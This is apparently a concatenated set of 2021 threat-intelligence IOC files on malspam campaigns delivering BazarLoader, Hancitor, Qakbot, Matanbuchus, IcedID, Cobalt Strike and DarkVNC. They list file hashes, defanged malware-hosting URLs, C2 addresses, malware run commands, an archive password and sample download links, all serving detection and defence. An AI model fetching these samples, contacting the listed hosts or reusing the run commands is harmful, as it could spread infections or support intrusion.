14 | 15 | 16 | EXAMPLE OF LINK FROM EMAIL: 17 | 18 | - hxxps://sites.google[.]com/view/m93ibv29fub4jr9n3n/drv/folders/shared/f/download?f=094707802844283701 19 | 20 | 21 | ASSOCIATED MALWARE: 22 | 23 | - SHA256 hash: d233d905290c4e9cb05f833b584ed2007fbc68d095a45b386dd078b05f1bde24 24 | - File size: 7,988 bytes 25 | - File name: DDoS attack proof and instructions on how to fix it.zip 26 | - File description: ZIP archive downloaded from link in contact form-generated email 27 | 28 | - SHA256 hash: c205e557970970af8d77cc2189d43eea3eb1f70ddc066201f93ab2134e4d32bd 29 | - File size: 23,241 bytes 30 | - File name: DDoS attack proof and instructions on how to fix it.js 31 | - File description: JavaScript file extracted from above ZIP archive 32 | 33 | - SHA256 hash: 8ea46ac64f5af7bb295a8b784738fc11fc0fde1543d7da43c0f97f88950185c4 34 | - File size: 481,809 bytes 35 | - File location: hxxp://manioris[.]space/333g100/main.php 36 | - File location: C:\Users\[username]\AppData\Local\Temp\StNsbaY.dat 37 | - File description: BazarLoader DLL 38 | - Run method: rundll32.exe [filename],StartW 39 | 40 | 41 | MALICIOUS DOMAIN HOSTING INITIAL ZIP ARCHIVE: 42 | 43 | - 172.67.217[.]206 port 443 - bunadrex[.]space 44 | 45 | JS RETRIEVING THE BAZARLOADER DLL: 46 | 47 | - 172.67.208[.]70 port 80 - manioris[.]space - GET /333g100/index.php 48 | - 172.67.208[.]70 port 80 - manioris[.]space - GET /333g100/main.php 49 | 50 | BAZAR C2: 51 | 52 | - 94.140.112[.]22 port 443 - hxxps://94.140.112[.]22/out/minor/issue/invoke 53 | - port 443 - hxxps://microsoft[.]com/telemetry/update.exe (not inherently malicious) 54 | - port 443 - hxxps://www.microsoft[.]com/telemetry/update.exe (not inherently malicious) 55 | - 139.28.235[.]249 port 443 - hxxps://139.28.235[.]249/out/minor/issue/invoke 56 | - 172.83.155[.]231 port 443 - hxxps://172.83.155[.]231/out/minor/issue/invoke -------------------------------------------------------------------------------- 
/2021-09-08-IOCs-for-Hancitor-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2021-09-08 (WEDNESDAY) - HANCITOR (CHANITOR/MAN1/MOSKALVZAPOE/TA511) WITH COBALT STRIKE (BEACON) 2 | 3 | EXAMPLE OF EMAIL HEADERS: 4 | 5 | - Received: from STICKNSTUCK.COM ([186.86.69[.]50]) 6 | - Date: Wed, 08 Sep 2021 10:42:29 -0500 7 | - From: "DocuSign Electronic Signature and Invoice Service" 8 | - Subject: You got notification from DocuSign Electronic Service 9 | 10 | - NOTE: STICKNSTUCK.COM is a parked domain being spoofed in emails from today's wave of Hancitor. 11 | 12 | EXAMPLE OF GOOGLE FEEDPROXY LINK USED IN MESSAGE TEXT: 13 | 14 | - hxxp://feedproxy.google[.]com/~r/lxbmpr/~3/sVt0mUVwDTM/derby.php 15 | 16 | ABOVE URL REDIRECTS TO THIS ONE TO SEND WORD DOC FOR HANCITOR: 17 | 18 | - hxxps://www.bpbj[.]id/derby.php?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+lxbmpr+%28terminallyassociated%29 19 | 20 | ASSOCIATED MALWARE: 21 | 22 | - SHA256 hash: 42d9fc8acb6df395cd148157f2410185572ef2adf04b4fe1eb2242c924d517ae 23 | - File size: 534,016 bytes 24 | - File name: 0908_3674663753075.doc 25 | - File description: Word doc for Hancitor returned after clicking link from DocuSign-themed malspam 26 | - Sample available at: https://bazaar.abuse.ch/sample/42d9fc8acb6df395cd148157f2410185572ef2adf04b4fe1eb2242c924d517ae/ 27 | 28 | - SHA256 hash: 28978a1c90c581fe12175afeb57e0c408b607997bcd60c188058a7aa7a1514cb 29 | - File size: 340,480 bytes 30 | - File location: C:\Users\[username]\AppData\Roaming\Microsoft\Templates\reform.doc 31 | - File description: Password-protected Word doc dropped after enabling macros, password: 2281337 32 | - Sample available at: https://bazaar.abuse.ch/sample/28978a1c90c581fe12175afeb57e0c408b607997bcd60c188058a7aa7a1514cb/ 33 | 34 | - SHA256 hash: 891cb03e77807de0ee50fb600358468a98af30eaf744e390ab45684ba06bfb91 35 | - File size: 605,696 bytes 36 | - File location: 
C:\Users\[username]\AppData\Roaming\Microsoft\Templates\hhh.mp3 37 | - File description: Hancitor malware DLL 38 | - Run method: rundll32.exe [filename],PKADTGUDFDW 39 | - Sample available at: https://bazaar.abuse.ch/sample/891cb03e77807de0ee50fb600358468a98af30eaf744e390ab45684ba06bfb91/ 40 | 41 | HANCITOR BUILD: 42 | 43 | - 0709_baxc7 44 | 45 | HANCITOR TRAFFIC: 46 | 47 | - port 80 - api.ipify.org - GET / 48 | - 93.125.114[.]53 port 80 - takitrisexp[.]ru - POST /8/forum.php 49 | - 185.49.68[.]111 port 80 - olocratim[.]ru - POST /8/forum.php 50 | - 62.109.19[.]44 port 80 - kedaeclas[.]ru - POST /8/forum.php 51 | 52 | TRAFFIC FOR FOLLOW-UP MALWARE (COBALT STRIKE): 53 | 54 | - 47.88.0[.]40 port 80 - klistr0n[.]ru - GET /0709.bin 55 | - 47.88.0[.]40 port 80 - klistr0n[.]ru - GET /0709s.bin 56 | 57 | COBALT STRIKE TRAFFIC: 58 | 59 | - 23.160.193[.]55 port 80 - 23.160.193[.]55 - GET /l7vC 60 | - 23.160.193[.]55 port 443 - HTTPS traffic 61 | - 23.160.193[.]55 port 80 - 23.160.193[.]55 - GET /ca 62 | - 23.160.193[.]55 port 80 - 23.160.193[.]55 - POST /submit.php?id= -------------------------------------------------------------------------------- /2021-10-07-Qakbot-obama111-and-Cobalt-Strike-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-10-07-Qakbot-obama111-and-Cobalt-Strike-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-10-18-IOCs-for-TR-based-Qakbot-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2021-10-18 (MONDAY) - TR-DISTRIBUTION QAKBOT (QBOT) WITH COBALT STRIKE 2 | 3 | NOTE: 4 | 5 | - This Qakbot infection is attributed to the TR distribution network, as metadata in the malware has a "TR" tag that names the infrastructure used to distribute the malware. 
6 | 7 | INFECTION CHAIN: 8 | 9 | - email --> link --> downloaded zip archive --> extracted Excel file --> enable macros --> installer DLL for Qakbot --> Qakbot C2 --> Cobalt Strike activity 10 | 11 | URLS FOR THE INITIAL ZIP ARCHIVE: 12 | 13 | - hxxp://ing-play[.]com/vitaelibero/inventoreest-31247564 14 | - hxxp://ing-play[.]com/vitaelibero/charts-3657249237.zip 15 | 16 | URLS FOR THE INITIAL QAKBOT DLL FILES: 17 | 18 | - hxxp://thanhanhotel[.]com/M7NvbognImhW/hnhkji.html 19 | - hxxps://guardsociety[.]org/4TMUUI9u/hnhkji.html 20 | - hxxp://bro.jerashfestival[.]jo/2kAlAJGc/hnhkji.html 21 | 22 | QAKBOT C2: 23 | 24 | - 103.143.8[.]71 port 443 - HTTPS traffic 25 | - 37.252.0[.]102 port 443 - HTTPS traffic 26 | - 23.111.114[.]52 port 65400 - TCP traffic 27 | 28 | COBALT STRIKE C2: 29 | 30 | - 213.227.154[.]159 port 443 - artysecuritybusinaudit[.]com - HTTPS traffic 31 | 32 | ASSOCIATED MALWARE: 33 | 34 | - SHA256 hash: 086e81e972597d576da5e7f43f12d5814c78acc5881e6bdc58e5659ee42c264f 35 | - File size: 198,572 bytes 36 | - File location: hxxp://ing-play[.]com/vitaelibero/charts-3657249237.zip 37 | - File name: inventoreest-31247564.zip 38 | - File description: Zip archive containing Excel file with macros for Qakbot 39 | 40 | - SHA256 hash: 555d97f2052c8ab8e81698c87f3558506f81d20eeee0138cd2d2e5051a6268aa 41 | - File size: 253,440 bytes 42 | - File name: trend-1367022806.xls 43 | - File description: Extracted from the above archive, Excel file with macros for Qakbot 44 | 45 | - SHA256 hash: 511acd21f0b7ad5bf8297ad113bc5feb0a252940009e7f0588fe001a00520702 46 | - File size: 807,518 bytes 47 | - File location: hxxp://thanhanhotel[.]com/M7NvbognImhW/hnhkji.html 48 | - File location: C:\Datop\test.test 49 | - File description: Corrupt DLL file not fully downloaded, so not actually malicious 50 | 51 | - SHA256 hash: d6b1d2ca4ea331f84bfeab5b0590c418a5f337e84a06344789530afeca1392c8 52 | - File size: 1,583,011 bytes 53 | - File location: 
hxxps://guardsociety[.]org/4TMUUI9u/hnhkji.html 54 | - File location: C:\Datop\test1.test 55 | - File description: Qakbot installer DLL file 56 | - Run method: regsvr32.exe -s [filename] 57 | 58 | - SHA256 hash: b6c7c10b2389872e1c16b8c398bb3192103ec858179ecb04c89ea93633173796 59 | - File size: 1,583,047 bytes 60 | - File location: hxxp://bro.jerashfestival[.]jo/2kAlAJGc/hnhkji.html 61 | - File location: C:\Datop\test2.test 62 | - File description: Qakbot installer DLL file 63 | - Run method: regsvr32.exe -s [filename] -------------------------------------------------------------------------------- /2021-11-03-TA551-BazarLoader-info.txt: -------------------------------------------------------------------------------- 1 | 2021-11-03 (WEDNESDAY) - TA551 (SHATHAK) BAZARLOADER INFECTION 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - malspam --> password-protected zip attachment --> extracted Word doc --> enable macros --> BazarLoader DLL --> post-infection activity --> Cobalt Strike as follow-up malware 6 | 7 | ASSOCIATED MALWARE: 8 | 9 | - SHA256 hash: 981cdead74b028ee7fb081f369abfde84e1e2ab1cd54ddd3b602ec937651904d 10 | - File size: 35,333 bytes 11 | - File name: instrument indenture,11.03.2021.doc 12 | - File description: TA551 Word document with macros for BazarLoader malware 13 | 14 | - SHA256 hash: 212a0b6d8e9951707e35d84ca4d6c42523fb99102548c34b8d6b83ecb6083534 15 | - File size: 3,366 bytes 16 | - File location: C:\Users\Public\girlYou.hta 17 | - File description: HTA file dropped by Word macros 18 | 19 | - SHA256 hash: 0ee9d13ecc93f06d1f7a1a6ae5f352c67c3e2a3c6314d53e3ad400f1b29054a1 20 | - File size: 442,495 bytes 21 | - File location: C:\Users\Public\nextNextLike.jpg 22 | - File description: Retrieved by .hta file, this is a DLL for BazarLoader 23 | - Run method: regsvr32.exe [filename] 24 | 25 | - SHA256 hash: 72ffe612b16ea8c81c1e1507b309c9452c894b4bdfc65971b7100085f41a45e9 26 | - File size: 153,649 bytes 27 | - File location: B899.dll 28 | - File description: DLL for 
Cobalt Strike seen after the initial infection 29 | - Run method: rundll32.exe [filename], hkyuFwDacGhvLOsGYdGaRF 30 | 31 | HTTP URL HOSTING INSTALLER DLL: 32 | 33 | - 45.95.11.201 port 80 - pulpfarmerd[.]com - GET /cbfsd/BlDFRsj1bsGvKdLIj/98697/7309/33451/Pg9zYLcfzirZtPtx1Pn64fLoWAIDvNPx4lclw/LaQAZSeiLYPCjjCble334/QdHhD0r/98/RDvuSh/zidem3?q=RYaTpLn2leLH6rxKG0pux1CME3RY&sid=UY8SVDRzRqZb&CWpJmycHi=iF0I26&sid=YGrkJjD4n&q=mbdtF5ziKWJczkstBlW0PBT7Ia&time=DEYO7nTt&q=EY7sl24iZtw7zTehznnCVwHt&q=G9FdCrnm6Z6yu HTTP/1.1 34 | 35 | BAZAR C2: 36 | 37 | - 87.120.37[.]231 port 443 - HTTPS traffic 38 | - 31.13.195[.]145 port 443 - HTTPS traffic 39 | 40 | COBALT STRIKE POST-INFECTION TRAFFIC: 41 | 42 | - 192.34.109[.]19 port 1443 - introwebsites[.]com - HTTPS traffic 43 | -------------------------------------------------------------------------------- /2021-11-04-IOCs-for-TR-Qakbot-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2021-11-04 (THURSDAY) - TR DISTRIBUTION QAKBOT (QBOT) WITH COBALT STRIKE 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - malspam --> link --> zip archive --> Excel file --> enable macros --> three DLLs for Qakbot --> Qakbot post-infection traffic --> Cobalt Strike traffic 6 | 7 | INITIAL ZIP/EXTRACTED EXCEL SPREADSHEET: 8 | 9 | - SHA256 hash: ce1b3d798bfdcd7503d29ff5841039ef7cb3fec51d7dd56cd3344b39a15fd4be 10 | - File size: 57,482 bytes 11 | - File name: autquia-4403601.zip 12 | - File location: hxxp://thepresentcupboard[.]com[.]au/aoptio/charts-297148749.zip 13 | 14 | - SHA256 hash: bd445bae74162f8e6b8d8e855b91d292df13fe28f41d08867edb2a8668d8c734 15 | - File size: 112,128 bytes 16 | - File name: index-2009541103.xls 17 | 18 | INITIAL QAKBOT DLL FILES: 19 | 20 | - SHA256 hash: 43074ef8cd5c2c859b6d21fae25431101872d7f9e79acc9f16f04e7cd64be9b8 21 | - File size: 995,253 bytes 22 | - File location: hxxps://decinfo[.]com[.]br/s4hfZyv7NFEM/y9.html 23 | - File location: C:\Datop\good.good 24 | - Run method: regsvr32 
[filename] 25 | - Distribution tag: TR 26 | 27 | - SHA256 hash: 080d33d769ff2c3d103174031d146d606bb0cb57a8fffaa18b4818b512e15c46 28 | - File size: 649,249 bytes 29 | - File location: hxxps://imprimija[.]com[.]br/BIt2Zlm3/y5.html 30 | - File location: C:\Datop\good1.good 31 | - Run method: regsvr32 [filename] 32 | - Distribution tag: TR 33 | 34 | - SHA256 hash: 0c8d1ba996e389aaf08269b7b9adf4360b86f4a70e8af1c2cbf32c34c7b3e887 35 | - File size: 995,298 bytes 36 | - File location: hxxps://stunningmax[.]com/JR3xNs7W7Wm1/y1.html 37 | - File location: C:\Datop\good2.good 38 | - Run method: regsvr32 [filename] 39 | - Distribution tag: TR 40 | 41 | PERSISTENT QAKBOT DLL FILE: 42 | 43 | - SHA256 hash: 4ae2caea3ebe8e5891ad21cf1a8efab399cfcbe2cec21248fb4914f0329b9416 44 | - File size: 1,071,616 bytes 45 | - File location: C:\Users\[username]\AppData\Roaming\Microsoft\Ejuio\cmmgurwtmo.dll 46 | - Run method: regsvr32.exe -s [filename] 47 | - Distribution tag: notset 48 | 49 | INITIAL URLS FOR ZIP DOWNLOAD: 50 | 51 | - 103.20.200[.]193 port 80 - hxxp://thepresentcupboard[.]com[.]au/aoptio/autquia-4403601 52 | - 103.20.200[.]193 port 80 - hxxp://thepresentcupboard[.]com[.]au/aoptio/charts-297148749.zip 53 | 54 | URLS GENERATED BY EXCEL MACRO FOR QAKBOT DLL FILES: 55 | 56 | - 108.179.193[.]34 port 443 - hxxps://decinfo[.]com[.]br/s4hfZyv7NFEM/y9.html 57 | - 108.179.192[.]18 port 443 - hxxps://imprimija[.]com[.]br/BIt2Zlm3/y5.html 58 | - 23.111.163[.]242 port 443 - hxxps://stunningmax[.]com/JR3xNs7W7Wm1/y1.html 59 | 60 | QAKBOT POST-INFECTION TRAFFIC: 61 | 62 | - 70.93.80[.]154 port 443 - attempted tcp connections 63 | - 75.66.88[.]33 port 443 - HTTPS traffic 64 | 65 | COBALT STRIKE TRAFFIC: 66 | 67 | - 45.141.87[.]3 port 443 - HTTPS traffic 68 | - 45.141.87[.]3 port 443 - decidedsecuritybusiness[.]com - HTTPS traffic 69 | - 23.83.133[.]202 port 443 - xarovaw[.]com - HTTPS traffic 70 | - 212.114.52[.]207 port 443 - dixeku[.]com - HTTPS traffic 
-------------------------------------------------------------------------------- /2021-11-05-TA551-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2021-11-05 (FRIDAY) - TA551 (SHATHAK) WORD DOC --> BAZARLOADER --> COBALT STRIKE AND DARK VNC 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - malspam --> password-protected zip attachment --> Word doc --> enable macros --> Bazarloader DLL --> Bazar C2 traffic --> Cobalt Strike & DarkVNC 6 | 7 | NOTES: 8 | 9 | - DarkVNC is a remote access trojan that was seen as early as 2017, but very little has been published about it publicly. References include: 10 | 11 | -- https://reaqta.com/2017/11/short-journey-darkvnc/ 12 | -- https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html 13 | 14 | Recent examples of similar malware identified as DarkVNC can be found at https://bazaar.abuse.ch/browse/tag/darkvnc/ 15 | 16 | ASSOCIATED MALWARE: 17 | 18 | - SHA256 hash: 4d1ba7c3d9cf95d861266734c00defbb10d3aae10aae1380029976a340a9e270 19 | - File size: 35,131 bytes 20 | - File name: require-11.21.doc 21 | - File description: TA551 Word doc retrieved from password-protected zip archive 22 | 23 | - SHA256 hash: 9bb19afbb65c8abb2e2ccdbcf455b21a9a531ab56ef955ff81f2d1d12a40da76 24 | - File size: 3,523 bytes 25 | - File location: C:\Users\Public\doorKarolNext.hta 26 | - File description: HTA file dropped after enabling macros on the above Word doc 27 | 28 | - SHA256 hash: 9368f92222c18019b0b25251c6cdd1d6bd05b46b2f02721ce5a32ffce5e08959 29 | - File size: 283,267 bytes 30 | - File location: C:\Users\Public\girlDowTube.jpg 31 | - File description: DLL for BazarLoader retrieved by above HTA file 32 | - Run method: regsvr32.exe [filename] 33 | 34 | - SHA256 hash: cee3128442b86e3dbc117fe491739c3a21dcd8bd813b2eec8321c59af7537081 35 | - File size: 161,263 bytes 36 | - File location: C:\Users\[username]\AppData\Local\Temp\C9C0.dll 37 | - File description: DLL for Cobalt Strike 38 | - Run method: 
rundll32.exe [filename], gfhcgfgDzsRALOPB 39 | 40 | - SHA256 hash: e09fa5be06248ef49fae8fc387b604c95b1bb93b871b2527d344b159f5cccfb6 41 | - File size: 404,992 bytes 42 | - File location: C:\Users\[username]\AppData\Local\Temp\FBE4.dll 43 | - File description: DLL for DarkVNC 44 | - Run method: rundll32.exe [filename],DllRegisterServer --id [32 character hex string] --group 19 --ip 87.120.8.190,158.69.133.70,185.106.120.99,45.14.226.195,103.124.106.154,149.3.170.201,5.181.80.103,89.41.182.242,172.83.155.186,45.42.201.179,194.15.112.223 45 | 46 | TA551 TRAFFIC TO RETRIEVE BAZARLOADER DLL: 47 | 48 | - 77.75.230[.]91 port 80 - covermillsd[.]com - GET /boolk/aIqT8eHh2Hd0kfbT0sjjwqP6/sAsvpDjipATdFg9SV2ylmJ5dJHdBeMU6BjCM/16138/gEwAwD8purFO/93628/36005/44935/leh6?search=QPCpFqx3ez051kem0kWeDEmwTR&search=6FfDVvSz&=0gBUpsPtKCh&RatBKf=ypH&pgJm=9XEl56FXiYmitVdrRN&id=XK5BeS&=1DhZbMsFNPDPRkyPOpqvEEXdO9oMi&q=zMhnzBGBO4R4dKv7h 49 | 50 | BAZAR C2 TRAFFIC: 51 | 52 | - 87.120.8[.]112 port 443 - HTTPS traffic 53 | - 87.120.254[.]96 port 443 - HTTPS traffic 54 | 55 | COBALT STRIKE TRAFFIC: 56 | 57 | - 192.34.109[.]102 port 757 - sonyblueprint[.]com - HTTPS traffic 58 | - 23.108.57[.]50 port 443 - guvafe[.]com - HTTPS traffic 59 | 60 | DARKVNC TRAFFIC: 61 | 62 | - 87.120.8[.]190 port 9090 63 | 64 | OTHER IP ADDRESSES USED FOR DARKVNC TRAFFIC (ALL USING TCP PORT 9090): 65 | 66 | - 158.69.133[.]70 67 | - 185.106.120[.]99 68 | - 45.14.226[.]195 69 | - 103.124.106[.]154 70 | - 149.3.170[.]201 71 | - 5.181.80[.]103 72 | - 89.41.182[.]242 73 | - 172.83.155[.]186 74 | - 45.42.201[.]179 75 | - 194.15.112[.]223 -------------------------------------------------------------------------------- /2021-11-15-IOCs-for-Matanbuchus-Qakbot-CobaltStrike-and-spambot-activity.txt: -------------------------------------------------------------------------------- 1 | 2021-11-15 (MONDAY) - MATANBUCHUS DELIVERS QAKBOT (DISTRIBUTION TAG: OBAMA128B), LEADS TO SPAMBOT AND COBALT STRIKE ACTIVITY 2 | 3 | NOTE: 4 | 5 | 
- For background on Matanbuchus, see: https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/ 6 | 7 | CHAIN OF EVENTS: 8 | 9 | - email --> zip attachment --> extracted Excel file --> enable macros --> Matanbuchus DLL --> Matanbuchus C2 --> Qakbot DLL --> Qakbot C2 --> spambot activity and Cobalt Strike 10 | 11 | ASSOCIATED MALWARE: 12 | 13 | - SHA256 hash: 18bd1ae701ff57a6d1119f18c53350688f41cbac0ea1ad0cb73234f6ab733404 14 | - File size: 240.445 bytes 15 | - File name: CLMCP 9215 Nov 15 (383).xlsb 16 | - File description: Excel file with macro for Matanbuchus DLL 17 | 18 | - SHA256 hash: aca6a42ef77fb9e13c8a77caad356b10b7f8114fa89de06acda9ab4e379a69f9 19 | - File size: 883,920 bytes 20 | - File location: hxxp://190.14.37[.]84/5555555.dat 21 | - File location: C:\ProgramData\delta.ocx 22 | - File description: Matanbuchus DLL retrieved by Excel macro 23 | - Run method: regsvr32.exe [filename] 24 | 25 | - SHA256 hash: b9b399dbb5d901c16d97b7c30cc182736cd83a7c53313194a1798d61f9c7501e 26 | - File size: 336,896 bytes 27 | - File location: hxxps://softwareupdatechecking[.]at/d8b8d14f-6842-46ec-b254-e92ffe990498/4ad4e44f 28 | - File description: Another DLL retrieved by Matanbuchus DLL 29 | - Run method: unknown 30 | - NOTE: Couldn't find this saved to disk, but C:\ProgramData\F1B2503007FE48B68E2406AD42928F5A\ was created approximately the same time as the related traffic 31 | 32 | - SHA256 hash: 3cde8a896848e9c28ccfcc2db7812602143de7be90aa44fcfe83c85ac7e53f9b 33 | - File size: 565,248 bytes 34 | - File location: hxxp://80.71.158[.]152/disjdifijdjifsdd.dat?iddqd=1 35 | - File location: C:\ProgramData\F1B2503007FE48B68E2406AD42928F5A\yKQeKcEeweN.ocx 36 | - File location: C:\Users\[username]\AppData\Roaming\Microsoft\Ljsxknicz\enkiysrb.dll 37 | - File description: Retrieved by Matanbuchus, Qakbot (Qbot) DLL, distribution tag: obama128b 38 | - Run method: regsvr32.exe -s [filename] 39 | 40 | TRAFFIC TO RETRIEVE MATANBUCHUS DLL: 41 | 42 | - 190.14.37[.]84 port 80 - 
190.14.37[.]84 - GET /5555555.dat 43 | 44 | TRAFFIC CAUSED BY MATANBUCHUS: 45 | 46 | - 193.56.146[.]60 port 443 - hxxps://checkingupdatesoftware[.]at/d8b8d14f-6842-46ec-b254-e92ffe990498/b32f9ccc 47 | - 193.56.146[.]61 port 443 - hxxps://softwareupdatechecking[.]at/d8b8d14f-6842-46ec-b254-e92ffe990498/4ad4e44f 48 | - 193.56.146[.]60 port 44413 - 193.56.146[.]60 - POST /GtHODfM/qilZw/YjtK.php 49 | - 193.56.146[.]61 port 44413 - 193.56.146[.]61 - POST /GtHODfM/qilZw/YjtK.php 50 | 51 | TRAFFIC CAUSED BY MATANBUCHUS TO RETRIEVE QAKBOT: 52 | 53 | - 80.71.158[.]152 port 80 - 80.71.158[.]152 - GET /disjdifijdjifsdd.dat?iddqd=1 54 | 55 | QAKBOT TRAFFIC: 56 | 57 | - 71.13.93[.]154 port 6881 - attempted TCP connections 58 | - 103.143.8[.]71 port 443 - attempted TCP connections 59 | - 50.194.160[.]233 port 443 - HTTPS traffic 60 | - 37.252.0[.]102 port 443 - HTTPS traffic 61 | - port 443 - www.openssl[.]org - HTTPS traffic (connectivity check, not inherently malicious) 62 | - 23.111.114[.]52 port 65400 - TCP traffic 63 | - various IP addresses, various ports - Email banner checks 64 | - port 443 - api.ipify[.]org - HTTPS traffic (IP address check, not inherently malicious) 65 | - various IP addresses, various ports (mostly TCP port 25) - spambot traffic (encrypted SMTP) 66 | 67 | COBALT STRIKE TRAFFIC: 68 | 69 | - 5.255.98[.]144 port 8888 - dxabt[.]com - HTTPS traffic -------------------------------------------------------------------------------- /2021-11-22-IOCs-for-Contact-Forms-campaign-activity.txt: -------------------------------------------------------------------------------- 1 | 2021-11-22 (MONDAY) - CONTACT FORMS CAMPAIGN PUSHES BAZARLOADER, LEADS TO COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - We previously called this the "Stolen Images Evidence" campaign, but it has also used other themes. 
6 | - This campaign uses contact pages on websites to generate emails 7 | - This campaign uses themes like DMCA violation (stolen images) or that the site is being used for a DDoS attack. 8 | - These form-based emails contain links to Google-hosted pages that deliver malicious zip archives. 9 | 10 | CHAIN OF EVENTS: 11 | 12 | - Email --> Link --> Stolen Images Evidence.zip --> Stolen Images Evidence.js --> BazarLoader DLL --> Bazar C2 traffic --> Cobalt Strike 13 | 14 | EXAMPLES OF MALICIOUS GOOGLEAPIS LINKS FROM THE EMAILS: 15 | 16 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/04jnm49fhb4mfk.html?f=98010055057206238 17 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/0j45nvm4ohhkf.html?h=616579298817753918 18 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/0j45nvm4ohhkf.html?h=814903596081662856 19 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/0j45nvm4ohhkf.html?l=247161489063871373 20 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/49gfhn49bfy34h.html?f=862528881239887564 21 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/49gfhn49bfy34h.html?l=865897479086522531 22 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/6k4mnbvkk49j.html?d=186853687282029549 23 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/9n5nw8yg4k4.html?h=385340095387424816 24 | 25 | ASSOCIATED MALWARE: 26 | 27 | - SHA256 hash: 8a2b83c479ac871edf5471d3a0ad91aaac8115ee2dd7ccb1f4a23e09da1ff2a4 28 | - File size: 2,734 bytes 29 | - File name: Stolen_Images_Evidence.zip 30 | - File description: ZIP archive downloaded from googleapis page 31 | 32 | - SHA256 hash: 7636d563c16a37aa05fdbe2b29e65c934f3f25d08b48d5ce91f3023e6f2e5729 33 | - File size: 6,248 bytes 34 | - File name: Stolen_Images_Evidence.js 35 | 
- File description: JS file extracted from the above ZIP archive 36 | 37 | - SHA256 hash: 30d991153e4d40909ff95b5252ce6f82b7e4ab064214da4ff28f02bd45ffd6fa 38 | - File size: 308,244 bytes 39 | - File location: hxxp://mosteplo[.]top/222g100/main.php 40 | - File location: C:\Users\[username]\AppData\Local\Temp\mnevPL.bin 41 | - File description: BazarLoader DLL retrieved by the above JS file 42 | 43 | TRAFFIC TO RETRIEVE THE ARCHIVE: 44 | 45 | - 104.21.19[.]55 port 443 - barconia[.]top - HTTPS traffic retrieved by googleapis page 46 | 47 | TRAFFIC TO RETRIEVE BAZARLOADER DLL: 48 | 49 | - 104.21.8[.]143 port 80 - mosteplo[.]top - GET /222g100/index.php 50 | - 104.21.8[.]143 port 80 - mosteplo[.]top - GET /222g100/main.php 51 | 52 | BAZAR C2 TRAFFIC: 53 | 54 | - 162.33.179[.]96 port 443 - HTTPS/SSL/TLS traffic 55 | - 162.33.178[.]153 port 443 - HTTPS/SSL/TLS traffic 56 | 57 | COBALT STRIKE TRAFFIC: 58 | 59 | - 185.81.114[.]125 port 443 - zuppohealth[.]com -------------------------------------------------------------------------------- /2021-12-10-IOCs-for-TA551-IcedID-infection-with-Cobalt-Strike-and-DarkVNC.txt: -------------------------------------------------------------------------------- 1 | 2021-12-10 (FRIDAY) - TA551 (SHATHAK) ICEDID (BOKBOT) WITH COBALT STRIKE & DARK VNC 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> password-protected zip archive --> Word doc --> enable macros --> installer DLL --> gzip binary --> persistent IcedID --> C2 activity --> Cobalt Strike & DarkVNC as follow-up malware 6 | 7 | NOTES: 8 | 9 | - Cobalt Strike and DarkVNC traffic occurred during this infection, but no binaries for these two malware families were saved to disk. 
10 | 11 | ASSOCIATED MALWARE: 12 | 13 | - SHA256 hash: 6a6a5c2082110a74eb93c7ae402366258db1a8b2fbd055f6f818c1beac1a0347 14 | - File size: 51,463 bytes 15 | - File name: Info.zip 16 | - File description: password-protected zip archive attached to email 17 | - Password: ujy55 18 | 19 | - SHA256 hash: 6403581b415e32cfb92c28f1628126f05a15e4583f33f5856f0dc731640ee955 20 | - File size: 43,512 bytes 21 | - File name: rule.12.21.doc 22 | - File description: TA551 Word doc with macros for IcedID installer 23 | 24 | - SHA256 hash: 27bda9f843a233947ed63de0107f8f23f2e5ce08bbf40cca29cedab2c285a1ed 25 | - File size: 3,535 bytes 26 | - File name: C:\Users\[username]\Documents\likePowLike.hta 27 | - File description: HTA file dropped by above Word document (HTA always in the Documents directory) 28 | 29 | - SHA256 hash: 91f6e11096604479f796787e8f4315cee982d7abb7d7e817f7377dd01e1b8b47 30 | - File size: 227,455 bytes 31 | - File location: hXXp://copelandbenefitg[.]com/frhe/1ukcmJN/yCvH52W8TJwx5X6Sfo0Cui6JnmHG2PFr2omut/MXdINzqAuUBxk4ZqjDiASIJQ0T2z9/BjpzhVrLsYXGsW2y8Lh5/repa7?user=oq7xaGpp0HeOeVHY&page=DJpnZd6hKsTc&page=IW96WhLYqVxOj4iAasoL5iF&time=sH0HCUHcuo&id=70Uezj2iHkaqZbtvoqIQoc6iX3ld&cid=q9XLicGSEHSJQ5DxImz1&=nlTMmjAL9k2huJIqBoyNbC4&q=c5bIpGxMHT&user=NwBOY6y5xcvi5wMU 32 | - File location: C:\Users\Public\loadLikeLoad.jpg 33 | - File description: Installer DLL for IcedID 34 | - Run method: regsvr32.exe [filename] 35 | 36 | - SHA256 hash: 2b948191f534f43a21842b4657eb2b58c9e3d9dc9ab4facf4b1f029c702800c8 37 | - File size: 462,973 bytes 38 | - File location: hXXp://jeliskvosh[.]com/ 39 | - File description: Binary retrieved by IcedID installer 40 | - File type: gzip compressed data, was "Income.txt", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1075616 41 | 42 